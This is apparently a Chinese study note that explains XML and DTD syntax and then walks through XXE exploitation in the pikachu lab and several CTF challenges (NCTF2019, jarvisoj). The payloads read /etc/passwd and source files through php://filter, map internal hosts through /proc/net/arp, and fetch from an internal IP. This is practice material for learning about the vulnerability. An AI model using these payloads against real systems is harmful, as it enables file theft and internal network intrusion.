文章目录
XXE
XML学习
- XML外部实体注入简称XXE漏洞,XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。
- 菜鸟教程实例
<?xml version="1.0" encoding="UTF-8"?>
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>
结构
- 必须包含根元素,它是所有其他元素的父元素,下面是xml的正常结构:
<root>
<child>
<subchild>.....</subchild>
</child>
</root>
属性和元素
- 将有关数据的数据存储为属性,而数据本身应当存储为元素。
- 例如:下面实例的id索引用来表示XML元素 将其作为属性
<messages>
<note id="501">
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>
<note id="502">
<to>Jani</to>
<from>Tove</from>
<heading>Re: Reminder</heading>
<body>I will not</body>
</note>
</messages>
验证
- XML 文档必须有一个根元素
- XML元素都必须有一个关闭标签
- XML 标签对大小写敏感
- XML 元素必须被正确的嵌套
- XML 属性值必须加引号
DTD 重点
- 文档类型定义,用来为XML文档定义语义约束
<!-- 内部声明 -->
<!DOCTYPE 根元素[元素声明]>
<!-- 外部引用 -->
<!DOCTYPE 根元素名称 SYSTEM "外部DTD的URI" >
<!-- 引用公共DTD -->
<!DOCTYPE 根元素名称 PUBLIC "DTD标识名" "公用DTD的URL">
- 内部声明实例
<?xml version="1.0"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
- 外部声明实例
<!DOCTYPE root-element SYSTEM "filename">
XXE漏洞
pikachu漏洞平台
- 提交一个正常的xml
<?xml version = "1.0"?>
<!DOCTYPE note [ <!ENTITY xxe "我的努力是要成为别人眼中不朽">]>
<name>&xxe;</name>
- 利用外部声明实例去读取信息
<?xml vsrsion = "1.0"?>
<!DOCTYPE note[ <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<name>&xxe;</name>
- 很奇怪我的php好像无法读取这个信息
- 更改了php的版本和加了扩展也不行 只能尝试一下别的方法了
<?xml version = "1.0"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php">
]>
<name>&xxe;</name>
- 这个又可以了,心态爆炸
[NCTF2019]Fake XML cookbook
- 进去先用burpsuit抓个登录的包
- 很明显
xml<user><username>123</username><password>123</password></user>
是xml的格式 - 利用xml去读取flag的信息 即可得到flag
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY flag SYSTEM "file:///flag">
]>
<user><username>&flag;</username><password></password></user>
[NCTF2019]True XML cookbook
- 同样先用burpsuit抓包
- 按照上一题的做法没有得到flag
- 但是得到了题目源码的地址/var/www/html/doLogin.php
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY flag SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/doLogin.php">
]>
<user><username>&flag;</username><password>123</password></user>
- 用php伪协议读取页面源码 发现没什么用
- 尝试攻入内网
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY flag SYSTEM "file:///etc/hosts">
]>
- 用etc/hosts读取当前域名下的ip地址奈何没读出来…
- 尝试一下file:///proc/net/arp读取
- 发现10.102.252.x的ip地址
- Bp爆破一下发现10.102.252.11这个ip地址读取一下可以得到flag
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY flag SYSTEM "http://10.102.252.11">
]>
<user><username>&flag;</username><password>123</password></user>
jarvisoj
- 题目链接:http://web.jarvisoj.com:9882/
- 解题
- 将Content-Type:application/json 改为 application/xml
- 然后插入下面的xml代码
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "file:///home/ctf/flag.txt">
]>
<name>
&xxe;
</name>